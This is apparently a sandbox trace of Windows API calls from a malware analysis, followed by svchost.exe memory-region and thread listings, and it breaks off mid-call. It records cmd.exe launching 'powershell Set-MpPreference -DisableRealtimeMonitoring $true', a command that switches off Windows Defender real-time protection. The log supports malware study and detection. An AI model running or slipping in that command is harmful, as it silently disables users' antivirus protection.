_wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0128.831] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0128.831] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0128.831] _wcsicmp (_String1="powershell", _String2="FOR") returned 10 [0128.831] _wcsicmp (_String1="powershell", _String2="IF") returned 7 [0128.831] _wcsicmp (_String1="powershell", _String2="REM") returned -2 [0128.832] _wcsnicmp (_String1="powe", _String2="cmd ", _MaxCount=0x4) returned 13 [0128.832] SetErrorMode (uMode=0x0) returned 0x0 [0128.832] SetErrorMode (uMode=0x1) returned 0x0 [0128.833] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x414ea8, lpFilePart=0x3df280 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3df280*="system32") returned 0x13 [0128.833] SetErrorMode (uMode=0x0) returned 0x1 [0128.833] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.833] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.839] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.839] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0xffffffff [0128.840] GetLastError () returned 0x2 [0128.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0xffffffff [0128.840] GetLastError () returned 0x2 [0128.840] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0xffffffff [0128.840] GetLastError () returned 0x2 [0128.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0xffffffff [0128.841] GetLastError () returned 0x2 [0128.841] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.841] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0xffffffff [0128.841] GetLastError () returned 0x2 [0128.841] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0xffffffff [0128.841] GetLastError () returned 0x2 [0128.841] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.841] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0xffffffff [0128.842] GetLastError () returned 0x2 [0128.842] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0xffffffff [0128.844] GetLastError () returned 0x2 [0128.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0x411e48 [0128.844] FindClose (in: hFindFile=0x411e48 | out: hFindFile=0x411e48) returned 1 [0128.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0xffffffff [0128.845] GetLastError () returned 0x2 [0128.845] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", fInfoLevelId=0x1, lpFindFileData=0x3deffc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deffc) returned 0x401248 [0128.845] FindClose (in: hFindFile=0x401248 | out: hFindFile=0x401248) returned 1 [0128.845] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.845] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.845] GetConsoleTitleW (in: lpConsoleTitle=0x3df4f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.845] InitializeProcThreadAttributeList (in: lpAttributeList=0x3df37c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3df444 | out: lpAttributeList=0x3df37c, lpSize=0x3df444) returned 1 [0128.845] UpdateProcThreadAttribute (in: lpAttributeList=0x3df37c, dwFlags=0x0, Attribute=0x60001, lpValue=0x3df43c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3df37c, lpPreviousValue=0x0) returned 1 [0128.845] GetStartupInfoW (in: lpStartupInfo=0x3df338 | out: lpStartupInfo=0x3df338*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0128.845] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0128.845] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0128.845] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0128.845] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.845] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.845] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0128.846] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0128.847] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.848] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x3df3d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="powershell Set-MpPreference -DisableRealtimeMonitoring $true", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3df424 | out: lpCommandLine="powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x3df424*(hProcess=0x78, hThread=0x74, dwProcessId=0xb50, dwThreadId=0xb68)) returned 1 [0128.852] CloseHandle (hObject=0x74) returned 1 [0128.852] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.852] GetEnvironmentStringsW () returned 0x413f90* [0128.852] FreeEnvironmentStringsW (penv=0x413f90) returned 1 [0128.852] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0153.763] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3df318 | out: lpExitCode=0x3df318*=0x1) returned 1 [0153.763] CloseHandle (hObject=0x78) returned 1 [0153.764] _vsnwprintf (in: _Buffer=0x3df460, _BufferCount=0x13, _Format="%08X", _ArgList=0x3df324 | out: _Buffer="00000001") returned 8 [0153.764] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0153.764] GetEnvironmentStringsW () returned 0x4121e0* [0153.764] FreeEnvironmentStringsW (penv=0x4121e0) returned 1 [0153.764] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0153.764] GetEnvironmentStringsW () returned 0x4121e0* [0153.764] FreeEnvironmentStringsW (penv=0x4121e0) returned 1 [0153.764] DeleteProcThreadAttributeList (in: lpAttributeList=0x3df37c | out: lpAttributeList=0x3df37c) [0153.764] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.764] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.764] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.764] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0153.765] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.765] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0153.765] SetConsoleInputExeNameW () returned 0x1 [0153.765] GetConsoleOutputCP () returned 0x1b5 [0153.765] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0153.765] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.765] exit (_Code=1) Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x425fe000" os_pid = "0x714" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x844" cmd_line = "C:\\Windows\\system32\\svchost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2577 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2578 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2579 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2580 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2581 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2582 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2583 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2584 start_va = 0x7fffb000 end_va = 0x7fffbfff entry_point = 0x0 region_type = private name = "private_0x000000007fffb000" filename = "" Region: id = 2585 start_va = 0xffaa0000 end_va = 0xffaaafff entry_point = 0xffaa0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2586 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2587 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2588 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2589 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2592 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2593 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2596 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2597 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2598 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2599 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2600 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2601 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2602 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2603 start_va = 0x10000000 end_va = 0x1001ffff entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 2604 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2605 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2606 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2607 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2608 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2614 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2615 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2616 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2617 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2618 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2619 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2620 start_va = 0xf0000 end_va = 0x118fff entry_point = 0xf0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2621 start_va = 0x510000 end_va = 0x697fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2622 start_va = 0xf0000 end_va = 0x118fff entry_point = 0xf0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2623 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2624 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2625 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2626 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2627 start_va = 0x6a0000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 2628 start_va = 0x830000 end_va = 0x1c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 2629 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2630 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2631 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2632 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2633 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2634 start_va = 0x7fefde50000 end_va = 0x7fefebd7fff entry_point = 0x7fefde50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2635 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2636 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2637 start_va = 0x7fefcf90000 end_va = 0x7fefcfb1fff entry_point = 0x7fefcf90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2638 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2639 start_va = 0x7fef6230000 end_va = 0x7fef62a0fff entry_point = 0x7fef6230000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2640 start_va = 0x7fef61c0000 end_va = 0x7fef6223fff entry_point = 0x7fef61c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2641 start_va = 0x7fefcfc0000 end_va = 0x7fefd00dfff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2642 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2643 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2644 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2645 start_va = 0x1c30000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 2646 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3119 start_va = 0x130000 end_va = 0x1acfff entry_point = 0x130000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3120 start_va = 0x130000 end_va = 0x1acfff entry_point = 0x130000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3121 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3122 start_va = 0x1e80000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3123 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3124 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 3125 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3126 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3127 start_va = 0x7fefb290000 end_va = 0x7fefb3b6fff entry_point = 0x7fefb290000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 3128 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3129 start_va = 0x1f00000 end_va = 0x21cefff entry_point = 0x1f00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3130 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Thread: id = 154 os_tid = 0xa08 [0128.524] NtClearEvent (EventHandle=0x8) returned 0x0 [0128.524] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0128.539] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x24f960) returned 0x102 [0128.539] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USER32.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x774e0000) returned 0x0 [0128.566] LdrLoadDll (in: 